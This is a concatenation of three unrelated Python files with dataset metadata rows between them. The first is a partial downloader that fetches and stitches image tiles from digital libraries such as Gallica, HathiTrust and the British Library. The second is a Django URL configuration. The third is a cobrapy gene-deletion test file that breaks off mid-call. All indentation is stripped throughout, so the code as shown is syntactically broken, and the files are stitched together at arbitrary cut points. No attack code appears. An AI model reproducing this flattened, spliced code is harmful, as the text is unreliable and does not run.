tiles_number_x = math.ceil(width / tile_size)
tiles_number_y = math.ceil(height / tile_size)
return TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size, image_width=width, image_height=height)
def sew_tiles_with_montage(folder, output_file, policy):
"""
Invokes montage tool from ImageMagick package to sew tiles together
"""
def format_magick_geometry(policy):
geometry = ""
if policy.tile_size is not None:
geometry += f"{policy.tile_size}x{policy.tile_size}"
if policy.overlap is not None:
geometry += f"-{policy.overlap}-{policy.overlap}"
if geometry:
#WARN:
# Do not allow enlarging tiles.
# Certain libraries (i. e. Gallica) use variable tile size
geometry += '>'
return geometry
def format_magick_tile(policy):
return f"{policy.tiles_number_x}x{policy.tiles_number_y}"
# Sewing tiles
cmd_line = [
"montage",
f"{folder}/*",
"-mode", "Concatenate"
]
geometry = format_magick_geometry(policy)
if geometry:
cmd_line += ["-geometry", geometry]
cmd_line += [
"-tile", format_magick_tile(policy),
output_file
]
print(f"Sewing tiles with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
if policy.image_width and policy.image_height:
# Cropping extra boundaries (right and bottom) added during sewing
cmd_line = [
"convert",
output_file,
"-extent", f"{policy.image_width}x{policy.image_height}",
output_file
]
print(f"Cropping output image with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
def download_and_sew_tiles(output_filename, url_maker, policy):
if os.path.exists(output_filename):
print(f"Skip downloading existing file {output_filename}")
tmp_folder = make_temporary_folder()
os.mkdir(tmp_folder)
try:
print(f"Downloading {policy.tiles_number_x}x{policy.tiles_number_y} tiled image to {output_filename}")
for tile_x in range(policy.tiles_number_x):
for tile_y in range(policy.tiles_number_y):
tile_file = os.path.join(tmp_folder, f"{tile_y:08d}_{tile_x:08d}.jpg")
get_binary(
tile_file,
url_maker(tile_x, tile_y)
)
sew_tiles_with_montage(tmp_folder, output_filename, policy)
finally:
if "KEEP_TEMP" not in os.environ:
shutil.rmtree(tmp_folder)
class IIPMetadata(object):
def __init__(self, tile_size, width, height, max_level):
self.tile_size = tile_size
self.width = width
self.height = height
self.max_level = max_level
@staticmethod
def from_json(json):
tile_size = 256
width = int(json["d"][-1]["w"])
height = int(json["d"][-1]["h"])
max_level = json["m"]
return IIPMetadata(tile_size, width, height, max_level)
@staticmethod
def from_text(text):
"""
Parses the following text:
```
Max-size:3590 3507
Tile-size:256 256
Resolution-number:5
```
"""
tile_size = None
width = None
height = None
max_level = None
for line in text.split('\n'):
parts = line.split(':')
if parts[0] == "Max-size":
(width, height) = map(int, parts[1].split())
elif parts[0] == "Tile-size":
tile_size = int(parts[1].split()[0])
elif parts[0] == "Resolution-number":
max_level = int(parts[1]) - 1
else:
pass
return IIPMetadata(tile_size, width, height, max_level)
def download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename):
policy = TileSewingPolicy.from_image_size(metadata.width, metadata.height, metadata.tile_size)
download_and_sew_tiles(
output_filename,
lambda tile_x, tile_y: requests.Request(
"GET",
fastcgi_url,
#WARN: passing parameters as string in order to send them in urldecoded form
#(iip does not support urlencoded parameters)
params=f"FIF={remote_filename}&JTL={metadata.max_level},{tile_y * policy.tiles_number_x + tile_x}",
),
policy
)
def download_book_from_iip(metadata_url, fastcgi_url, output_folder, files_root):
"""
Downloads book served by IIPImage fastcgi servant.
API is documented here:
http://iipimage.sourceforge.net/documentation/protocol/
"""
metadata = get_json(metadata_url)["pgs"]
print(f"Going to download {len(metadata)} pages")
for page_number, page_metadata in enumerate(metadata):
iip_page_metadata = IIPMetadata.from_json(page_metadata)
remote_filename = os.path.join(files_root, page_metadata["f"])
output_filename = make_output_filename(output_folder, page_number)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page_number:04d}")
continue
else:
print(f"Downloading page #{page_number:04d}")
download_image_from_iip(fastcgi_url, remote_filename, iip_page_metadata, output_filename)
def download_image_from_iiif(base_url, output_filename):
"""
Downloads single image via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
DESIRED_QUALITIES = ["color", "native", "default"]
DESIRED_FORMATS = ["png", "tif", "jpg"]
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
left = tile_size * tile_x
top = tile_size * tile_y
tile_width = min(width - left, tile_size)
tile_height = min(height - top, tile_size)
tile_url = f"{base_url}/{left},{top},{tile_width},{tile_height}/{tile_width},{tile_height}/0/{desired_quality}.{desired_format}"
return tile_url
metadata_url = f"{base_url}/info.json"
metadata = get_json(metadata_url)
if "tiles" in metadata:
# Served by e. g. vatlib servant
tile_size = metadata["tiles"][0]["width"]
else:
# Served by e. g. Gallica servant
tile_size = 1024
width = metadata["width"]
height = metadata["height"]
desired_quality = "default"
desired_format = "jpg"
profile = metadata.get("profile")
if (profile is not None) and (len(profile) >= 2) and (profile is not str):
# Profile is not served by Gallica servant, but served by e. g. British Library servant
# Complex condition helps to ignore missing metadata fields, see e. g.:
# https://gallica.bnf.fr/iiif/ark:/12148/btv1b10508435s/f1/info.json
# http://www.digitale-bibliothek-mv.de/viewer/rest/image/PPN880809493/00000001.tif/info.json
if "qualities" in profile[1]:
available_qualities = profile[1]["qualities"]
for quality in DESIRED_QUALITIES:
if quality in available_qualities:
desired_quality = quality
break
else:
raise RuntimeError(f"Can not choose desired image quality. Available qualities: {available_qualities!r}")
if "formats" in profile[1]:
available_formats = profile[1]["formats"]
for format in DESIRED_FORMATS:
if format in available_formats:
desired_format = format
break
else:
raise RuntimeError(f"Can not choose desired image format. Available formats: {available_formats!r}")
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
download_and_sew_tiles(output_filename, UrlMaker(), policy)
def download_book_from_iiif(manifest_url, output_folder):
"""
Downloads entire book via IIIF protocol.
API is documented here:
http://iiif.io/about/
"""
manifest = get_json(manifest_url)
canvases = manifest["sequences"][0]["canvases"]
for page, metadata in enumerate(canvases):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skip downloading existing page #{page:04d}")
continue
base_url = metadata["images"][-1]["resource"]["service"]["@id"]
download_image_from_iiif(base_url, output_filename)
MAX_TILE_NUMBER = 100
def guess_tiles_number_x(url_maker):
tiles_number_x = 0
for tiles_number_x in range(MAX_TILE_NUMBER):
probable_url = url_maker(tiles_number_x, 0)
if probable_url is None:
break
head_response = requests.get(probable_url)
if head_response.status_code != 200:
break
return tiles_number_x
def guess_tiles_number_y(url_maker):
tiles_number_y = 0
for tiles_number_y in range(MAX_TILE_NUMBER):
probable_url = url_maker(0, tiles_number_y)
if probable_url is None:
break
head_response = requests.head(probable_url)
if head_response.status_code != 200:
break
return tiles_number_y
###################
#TILE BASED DOWNLOADERS
###################
@opster.command()
def gallica(
id=("", "", "Id of the book to be downloaded (e. g. 'btv1b7200356s')")
):
"""
Downloads book from https://gallica.bnf.fr/
"""
manifest_url = f"https://gallica.bnf.fr/iiif/ark:/12148/{id}/manifest.json"
output_folder = make_output_folder("gallica", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def encyclopedie(
volume=("", "", "Volume to be downloaded (e. g. '24')"),
page=("", "", "Page number to be downloaded (e. g. '247')")
):
"""
Downloads single image from http://enccre.academie-sciences.fr/encyclopedie
"""
volume = int(volume)
page = int(page)
#there is no manifest.json file, slightly modified IIIF protocol is being used by the website
image_list_url = f"http://enccre.academie-sciences.fr/icefront/api/volume/{volume}/imglist"
image_list_metadata = get_json(image_list_url)
image_metadata = image_list_metadata[page]
image_url = f"http://enccre.academie-sciences.fr/digilib/Scaler/IIIF/{image_metadata['image']}"
output_file = f"{page:04d}.bmp"
download_image_from_iiif(image_url, output_file)
@opster.command()
def vatlib(
id=("", "", "Id of the book to be downloaded (e. g. 'MSS_Cappon.203')")
):
"""
Downloads book from http://digi.vatlib.it/
"""
manifest_url = f"http://digi.vatlib.it/iiif/{id}/manifest.json"
output_folder = make_output_folder("vatlib", id)
download_book_from_iiif(manifest_url, output_folder)
@opster.command()
def mecklenburgVorpommern(
id=("", "", "Id of the book to be downloaded (e. g. 'PPN880809493')")
):
"""
Downloads book from http://www.digitale-bibliothek-mv.de
"""
# it looks like Mecklenburg-Vorpommern does not use manifest.json
output_folder = make_output_folder("mecklenburg_vorpommern", id)
for page in range(1, 1000):
output_filename = make_output_filename(output_folder, page)
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
continue
try:
base_url = f"http://www.digitale-bibliothek-mv.de/viewer/rest/image/{id}/{page:08d}.tif"
download_image_from_iiif(base_url, output_filename)
except ValueError:
break
@opster.command()
def prlib(
id=("", "", "Book id to be downloaded (e. g. '20596C08-39F0-4E7C-92C3-ABA645C0E20E')"),
secondary_id=("", "", "Secondary id of the book (e. g. '5699092')"),
page=("p", "", "Download specified (zero-based) page only"),
):
"""
Downloads book from https://www.prlib.ru/
"""
metadata_url = f"https://content.prlib.ru/metadata/public/{id}/{secondary_id}/{id}.json"
files_root = f"/var/data/scans/public/{id}/{secondary_id}/"
fastcgi_url = "https://content.prlib.ru/fcgi-bin/iipsrv.fcgi"
output_folder = make_output_folder("prlib", id)
if page:
page = int(page)
output_filename = make_output_filename(output_folder, page)
metadata = get_json(metadata_url)
page_metadata = metadata[page]
remote_filename = os.path.join(files_root, page_metadata["f"])
download_image_from_iip(fastcgi_url, remote_filename, page_metadata, output_filename)
else:
download_book_from_iip(
metadata_url=metadata_url,
fastcgi_url=fastcgi_url,
files_root=files_root,
output_folder=output_folder
)
@opster.command()
def nga(
id=("", "", "Image id to be downloaded (e. g. `49035`)")
):
"""
Downloads single image from https://www.nga.gov
"""
slashed_image_id = "/".join(id) #will produce "4/9/0/3/5" from "49035-primary-0-nativeres"
remote_filename = f"/public/objects/{slashed_image_id}/{id}-primary-0-nativeres.ptif"
fastcgi_url="https://media.nga.gov/fastcgi/iipsrv.fcgi"
metadata = IIPMetadata.from_text(
get_text(f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number")
)
download_image_from_iip(
fastcgi_url=fastcgi_url,
remote_filename=remote_filename,
metadata=metadata,
output_filename=f"nga.{id}.bmp"
)
@opster.command()
def hab(
id=("", "", "Image id to be downloaded (e. g. `grafik/uh-4f-47-00192`)")
):
"""
Downloads single image from http://diglib.hab.de and http://kk.haum-bs.de
(both redirect to Virtuelles Kupferstichkabinett website, which is too hard to be typed)
"""
#The site does not use any metadata and simply sends unnecessary requests to backend
#Using head requests to get maximum available zoom and
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://diglib.hab.de/varia/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 10
TILE_SIZE = 256
max_zoom = None
for test_zoom in range(MAX_ZOOM + 1):
if UrlMaker(test_zoom)(0, 0) is not None:
max_zoom = test_zoom
else:
#current zoom is not available - consider previous one to be maximal
break
assert(max_zoom is not None)
print(f"Guessed max_zoom={max_zoom}")
#The site does not use any metadata and simply sends unnecessary requests to backend
#Guessing tiles_number_x, tiles_number_y using HEAD requests with guessed max_zoom
#
#UrlMaker returns None when corresponding tile does not exist
#
#FIXME: one can save some requests using bisection here,
#but python standard library is too poor to have one
url_maker = UrlMaker(max_zoom)
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, TILE_SIZE)
output_filename = make_output_filename(id.replace("/", "."))
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def yaleImage(
id=("", "", "Image id to be downloaded (e. g. `lwlpr11386`)")
):
"""
Downloads image from http://images.library.yale.edu/
"""
class UrlMaker(object):
"""
Similar to UrlMaker from hab() method. Should be deduplicated once
"""
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
for tile_group in [0, 1, 2]:
probable_url = f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/TileGroup{tile_group}/{self.zoom}-{tile_x}-{tile_y}.jpg"
head_response = requests.head(probable_url)
if head_response.status_code == 200:
return probable_url
return None
MAX_ZOOM = 5
#FIXME: replace 011000 with computed expression
metadata = ElementTree.fromstring(get_text(f"http://images.library.yale.edu/walpoleimages/dl/011000/{id}/ImageProperties.xml"))
width = int(metadata.attrib["WIDTH"])
height = int(metadata.attrib["HEIGHT"])
tile_size = int(metadata.attrib["TILESIZE"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
output_filename = make_output_filename(id)
download_and_sew_tiles(output_filename, UrlMaker(MAX_ZOOM), policy)
@opster.command()
def yaleBook(
id=("", "", "Image id to be downloaded (e. g. `BRBL_Exhibitions/7/1327507/1327507`)")
):
"""
Downloads image from https://brbl-zoom.library.yale.edu
"""
modulo = id[-1]
output_filename = make_output_filename("", id)
remote_filename = f"BRBL_Exhibitions/{modulo}/{id}/{id}.jp2"
fastcgi_url = "https://brbl-zoom.library.yale.edu/fcgi-bin/iipsrv.fcgi"
metadata_url = f"{fastcgi_url}?FIF={remote_filename}&obj=Max-size&obj=Tile-size&obj=Resolution-number"
metadata = IIPMetadata.from_text(get_text(metadata_url))
download_image_from_iip(fastcgi_url, remote_filename, metadata, output_filename)
@opster.command()
def britishLibraryBook(
id=("", "", "Book id to be downloaded (e. g. `vdc_100026052453`, as it is displayed in the viewer url)")
):
"""
Downloads a book from http://explore.bl.uk
"""
output_folder = make_output_folder("bl", id)
manifest_url = f"https://api.bl.uk/metadata/iiif/ark:/81055/{id}.0x000001/manifest.json"
download_book_from_iiif(manifest_url, output_folder)
class DeepZoomUrlMaker(object):
def __init__(self, base_url, max_zoom, ext="jpg"):
self.base_url = base_url
self.max_zoom = max_zoom
self.ext = ext
def __call__(self, tile_x, tile_y):
return f"{self.base_url}/{self.max_zoom}/{tile_x}_{tile_y}.{self.ext}"
def download_image_from_deepzoom(output_filename, metadata_url, url_maker):
image_metadata = get_xml(metadata_url)
tile_size = int(image_metadata.attrib["TileSize"])
overlap = int(image_metadata.attrib["Overlap"])
size_metadata = image_metadata.getchildren()[0]
width = int(size_metadata.attrib["Width"])
height = int(size_metadata.attrib["Height"])
policy = TileSewingPolicy.from_image_size(width, height, tile_size)
policy.overlap = overlap
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def leidenCollection(
id=("", "", "Image id of the painting to be downloaded(e. g. `js-108-jan_steen-the_fair_at_warmond_files`)")
):
"""
Downloads single image from https://www.theleidencollection.com
"""
MAX_ZOOM = 13
class UrlMaker(object):
def __call__(self, tile_x, tile_y):
return f"https://www.theleidencollection.com/LeidenCollectionSamples/images/{id}_files/{MAX_ZOOM}/{tile_x}_{tile_y}.jpg"
url_maker = UrlMaker()
tiles_number_x = guess_tiles_number_x(url_maker)
print(f"Guessed tiles_number_x={tiles_number_x}")
tiles_number_y = guess_tiles_number_y(url_maker)
print(f"Guessed tiles_number_y={tiles_number_y}")
policy = TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size=None, overlap=None)
output_filename = make_output_filename("", id)
download_and_sew_tiles(output_filename, url_maker, policy)
@opster.command()
def britishLibraryManuscript(
id=("", "", "Page id of the manuscript to be downloaded (e. g. `add_ms_12531!1_f005r`)")
):
"""
Downloads single manuscript page from http://www.bl.uk/manuscripts/Default.aspx
"""
def parse_id(full_id):
manuscript_id, _, page_id = tuple(id.rpartition('_'))
return (manuscript_id, page_id)
manuscript_id, page_id = parse_id(id)
#WARN: here and below base_url and metadata_url have common prefix. One might save something
metadata_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}.xml"
output_folder = make_output_folder("bl", manuscript_id)
output_filename = make_output_filename(output_folder, page_id)
MAX_ZOOM = 13
base_url = f"http://www.bl.uk/manuscripts/Proxy.ashx?view={id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def makAt(
id=("", "", "Id of the image to be downloaded (e. g. `ki-6952-1_1`)")
):
"""
Downloads single image from https://sammlung.mak.at/
"""
metadata_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}.xml"
output_filename = make_output_filename('.', id)
MAX_ZOOM = 11
base_url = f"https://sammlung.mak.at/img/zoomimages/publikationsbilder/{id}_files"
url_maker = DeepZoomUrlMaker(base_url, MAX_ZOOM)
download_image_from_deepzoom(output_filename, metadata_url, url_maker)
@opster.command()
def uniJena(
id=("", "", "Id of the image to be downloaded, including document id (e. g. `00108217/JLM_1787_H002_0003_a`)")
):
"""
Downloads single image from https://zs.thulb.uni-jena.de
Requires a lot of work though
"""
class UrlMaker(object):
def __init__(self, zoom):
self.zoom = zoom
def __call__(self, tile_x, tile_y):
return f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/{self.zoom}/{tile_y}/{tile_x}.jpg"
metadata_url = f"https://zs.thulb.uni-jena.de/servlets/MCRTileServlet/jportal_derivate_{id}.tif/imageinfo.xml"
metadata = get_xml(metadata_url)
output_filename = make_output_filename("", os.path.basename(id))
width = int(metadata.attrib["width"])
height = int(metadata.attrib["height"])
zoom = int(metadata.attrib["zoomLevel"])
TILE_SIZE = 256
policy = TileSewingPolicy.from_image_size(width, height, TILE_SIZE)
url_maker = UrlMaker(zoom)
download_and_sew_tiles(output_filename, url_maker, policy)
subprocess.check_call([
"convert",
output_filename,
"-crop", f"{width}x{height}+0+0",
output_filename
])
###################
#PAGE BASED DOWNLOADERS
###################
@opster.command()
def locMusdi(
id=("", "", "Id of the book to be downloaded (e. g. `056`)"),
start_from=("", 1, "The number of the first page in the sequence (defaults to 1)")
):
"""
Downloads book from Library of Congress Music/Dance instruction
"""
start_from = int(start_from)
# Some ids are known to be missing
MISSING_IDS = [
"050", "054", "057", "061", "071",
"078", "083", "095", "100", "103",
"106", "111", "116", "120", "135",
"152", "172", "173", "175", "176",
"180", "185", "192", "193", "196",
"206", "223", "231", "232", "234",
"238", "244", "249",
]
MAX_ID = 252
if len(id) != 3:
print("Expected id to have 3 digits. Please, recheck the ID.")
sys.exit(1)
if id in MISSING_IDS:
print(f"The book with id musdi.{id} is known to be missing. Please, recheck the ID.")
sys.exit(1)
if int(id) > MAX_ID:
print(f"The maximum id is musdi.{MAX_ID}. Please, recheck the ID.")
sys.exit(1)
output_folder = make_output_folder("locMusdi", id)
for page in range(start_from, 1000):
base_url = f"https://memory.loc.gov/music/musdi/{id}/{page:04d}"
url = None
for extension in ["tif", "jpg"]:
output_filename = make_output_filename(output_folder, page, extension=extension)
if os.path.exists(output_filename):
break
maybe_url = base_url + "." + extension
head_response = requests.head(maybe_url)
if head_response.status_code == http.client.OK:
url = maybe_url
break
if url is None:
break
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page #{page:08d}")
get_binary(output_filename, url)
@opster.command()
def hathi(
id=("", "", "Id of the book to be downloaded (e. g. `wu.89005529961`)")
):
"""
Downloads book from http://www.hathitrust.org/
"""
output_folder = make_output_folder("hathi", id)
meta_url = f"https://babel.hathitrust.org/cgi/imgsrv/meta?id={id}"
metadata = get_json(meta_url)
total_pages = metadata["total_items"]
print(f"Going to download {total_pages} pages to {output_folder}")
for page in range(1, total_pages):
url = f"https://babel.hathitrust.org/cgi/imgsrv/image?id={id};seq={page};width=1000000"
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page {page} to {output_filename}")
get_binary(output_filename, url)
@opster.command()
def vwml(
id=("", "", "Id of the book to be downloaded (e. g. `Wilson1808`)")
):
"""
Downloads book from https://www.vwml.org/topics/historic-dance-and-tune-books
"""
main_url = f"https://www.vwml.org/topics/historic-dance-and-tune-books/{id}"
main_markup = get_text(main_url)
soup = bs4.BeautifulSoup(main_markup, "html.parser")
output_folder = make_output_folder("vwml", id)
for page, thumbnail in enumerate(soup.find_all("img", attrs={"class": "image_thumb"})):
thumbnail_url = thumbnail.attrs["src"]
#IT'S MAGIC!
full_url = thumbnail_url.replace("thumbnails", "web")
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Saving {full_url} to {output_filename}")
try:
get_binary(output_filename, full_url, verify=False)
except ValueError:
#VWML is known to have missing pages listed in this table.
#Ignoring such pages
pass
@opster.command()
def onb(
id=("", "", "Id of the book to be downloaded (e. g. `ABO_+Z178189508`)")
):
"""
Downloads book from http://onb.ac.at/
"""
# First, normalizing id
id = id.replace('/', '_')
if id.startswith("ABO"):
flavour = "OnbViewer"
elif id.startswith("DTL"):
flavour = "RepViewer"
else:
raise RuntimeError(f"Can not determine flavour for {id}")
# Second, obtaining JSESSIONID cookie value
viewer_url = f"http://digital.onb.ac.at/{flavour}/viewer.faces?doc={id}"
viewer_response = requests.get(viewer_url)
cookies = viewer_response.cookies
metadata_url = f"http://digital.onb.ac.at/{flavour}/service/viewer/imageData?doc={id}&from=1&to=1000"
metadata = get_json(metadata_url, cookies=cookies)
output_folder = make_output_folder("onb", id)
image_data = metadata["imageData"]
print(f"Going to download {len(image_data)} images")
for image in image_data:
query_args = image["queryArgs"]
image_id = image["imageID"]
image_url = f"http://digital.onb.ac.at/{flavour}/image?{query_args}&s=1.0&q=100"
output_filename = make_output_filename(output_folder, image_id, extension=None)
if os.path.isfile(output_filename):
print(f"Skip downloading existing image {image_id}")
continue
print(f"Downloading {image_id}")
get_binary(output_filename, image_url, cookies=cookies)
@opster.command()
def staatsBerlin(
id=("", "", "Id of the book to be downloaded (e. g. `PPN86902910X`)")
):
"""
Downloads book from http://digital.staatsbibliothek-berlin.de/
"""
output_folder = make_output_folder("staatsBerlin", id)
page = 1
while True:
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
else:
try:
image_url = f"http://ngcs.staatsbibliothek-berlin.de/?action=metsImage&metsFile={id}&divID=PHYS_{page:04d}"
#WARN:
# it looks like there is no normal way
# to get the number of pages in the book via http request
get_binary(output_filename, image_url)
except ValueError:
print(f"No more images left. Last page was {page - 1:04d}")
break
page += 1
@opster.command()
def polona(
id=("", "", "Base64-encoded id of the book to be downloaded (e. g. `Nzg4NDk0MzY`, can be found in permalink)")
):
"""
Downloads book from https://polona.pl
"""
entity_url = f"https://polona.pl/api/entities/{id}"
entity_metadata = get_json(entity_url)
output_folder = make_output_folder("polona", id)
for page, page_metadata in enumerate(entity_metadata["scans"]):
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
found = False
for image_metadata in page_metadata["resources"]:
if image_metadata["mime"] == "image/jpeg":
get_binary(output_filename, image_metadata["url"])
found = True
if not found:
raise Exception(f"JPEG file was not found in image_metadata for page {page}")
@opster.command()
def haab(
id=("", "", "Id of the book to be downloaded (e. g. `1286758696_1822000000/EPN_798582804`)")
):
"""
Downloads book from https://haab-digital.klassik-stiftung.de/
"""
def make_url(page):
return f"https://haab-digital.klassik-stiftung.de/viewer/rest/image/{id}_{page:04d}.tif/full/10000,10000/0/default.jpg"
output_folder = make_output_folder("haab", id)
page = 0
# HAAB server returns 403 for non-existing pages. First,
while True:
page_url = make_url(page)
head_response = requests.head(page_url)
if head_response.status_code == 200:
print(f"Found starting page {page:04d}")
break
page += 1
exception_count = 0
while True:
page_url = make_url(page)
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
page += 1
continue
try:
print(f"Downloading page #{page:08d}")
get_binary(output_filename, page_url)
page += 1
except ValueError as ex:
page += 1
#WARN:
# Certain pages can return 403 even in the middle of the book.
# Skipping certain number of such pages.
exception_count += 1
if exception_count < 10:
print(f"Got ValueError while getting page {page:08d}: {ex}")
continue
else:
print(f"Got exception while getting page {page:08d}: {ex}. Exception limit was reached, downloader will exit now.")
break
if __name__ == "__main__":
opster.dispatch()
| gpl-3.0 | 1,744,960,985,823,110,000 | 31.074672 | 137 | 0.693922 | false |
bczmufrn/frequencia | frequencia/urls.py | 1 | 2221 | """frequencia URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.urls import path
from django.conf import settings
from django.contrib import admin
from django.conf.urls import include
from django.conf.urls.static import static
urlpatterns = [
path('', include('frequencia.core.urls', namespace='core')),
path('registro/', include('frequencia.registro.urls', namespace='registro')),
path('vinculos', include('frequencia.vinculos.urls', namespace='vinculos')),
path('calendario/', include('frequencia.calendario.urls', namespace='calendario')),
path('justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
path('relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
path('conta/', include('frequencia.accounts.urls', namespace='accounts')),
path('admin/', admin.site.urls),
]
# urlpatterns = [
# url(r'^', include('frequencia.core.urls', namespace='core')),
# url(r'^registro/', include('frequencia.registro.urls', namespace='registro')),
# url(r'^vinculos/', include('frequencia.vinculos.urls', namespace='vinculos')),
# url(r'^calendario/', include('frequencia.calendario.urls', namespace='calendario')),
# url(r'^justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
# url(r'^relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
# url(r'^admin/', admin.site.urls),
# url(r'^conta/', include('frequencia.accounts.urls', namespace='accounts')),
# ]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | mit | 7,764,757,986,167,539,000 | 47.304348 | 99 | 0.70869 | false |
opencobra/cobrapy | src/cobra/test/test_flux_analysis/test_deletion.py | 1 | 11849 | # -*- coding: utf-8 -*-
"""Test functionalities of reaction and gene deletions."""
from __future__ import absolute_import
import math
import numpy as np
import pytest
from pandas import Series
from cobra.flux_analysis.deletion import (
double_gene_deletion,
double_reaction_deletion,
single_gene_deletion,
single_reaction_deletion,
)
from cobra.flux_analysis.room import add_room
# Single gene deletion FBA
def test_single_gene_deletion_fba_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using FBA."""
model.solver = all_solvers
benchmark(single_gene_deletion, model)
def test_single_gene_deletion_fba(model, all_solvers):
"""Test single gene deletion using FBA."""
# expected knockouts for textbook model
model.solver = all_solvers
growth_dict = {
"b0008": 0.87,
"b0114": 0.80,
"b0116": 0.78,
"b2276": 0.21,
"b1779": 0.00,
}
result = single_gene_deletion(
model=model, gene_list=list(growth_dict), method="fba", processes=1
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Singe gene deletion MOMA
def test_single_gene_deletion_moma_benchmark(model, benchmark, qp_solvers):
"""Benchmark single gene deletion using MOMA."""
model.solver = qp_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion, model=model, gene_list=genes, method="moma", processes=1
)
def test_single_gene_deletion_moma(model, qp_solvers):
"""Test single gene deletion using MOMA."""
model.solver = qp_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.71,
"b0116": 0.56,
"b2276": 0.11,
"b1779": 0.00,
}
result = single_gene_deletion(
model=model, gene_list=list(growth_dict), method="moma", processes=1
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
def test_single_gene_deletion_moma_reference(model, qp_solvers):
"""Test single gene deletion using MOMA (reference solution)."""
model.solver = qp_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.71,
"b0116": 0.56,
"b2276": 0.11,
"b1779": 0.00,
}
sol = model.optimize()
result = single_gene_deletion(
model=model,
gene_list=list(growth_dict),
method="moma",
solution=sol,
processes=1,
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Single gene deletion linear MOMA
def test_single_gene_deletion_linear_moma_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using linear MOMA."""
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion,
model=model,
gene_list=genes,
method="linear moma",
processes=1,
)
def test_single_gene_deletion_linear_moma(model, all_solvers):
"""Test single gene deletion using linear MOMA (reference solution)."""
model.solver = all_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.76,
"b0116": 0.65,
"b2276": 0.08,
"b1779": 0.00,
}
sol = model.optimize()
result = single_gene_deletion(
model=model,
gene_list=list(growth_dict),
method="linear moma",
solution=sol,
processes=1,
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Single gene deletion ROOM
def test_single_gene_deletion_room_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using ROOM."""
if all_solvers == "glpk":
pytest.skip("GLPK is too slow to run ROOM.")
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion, model=model, gene_list=genes, method="room", processes=1
)
# Single gene deletion linear ROOM
def test_single_gene_deletion_linear_room_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using linear ROOM."""
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion,
model=model,
gene_list=genes,
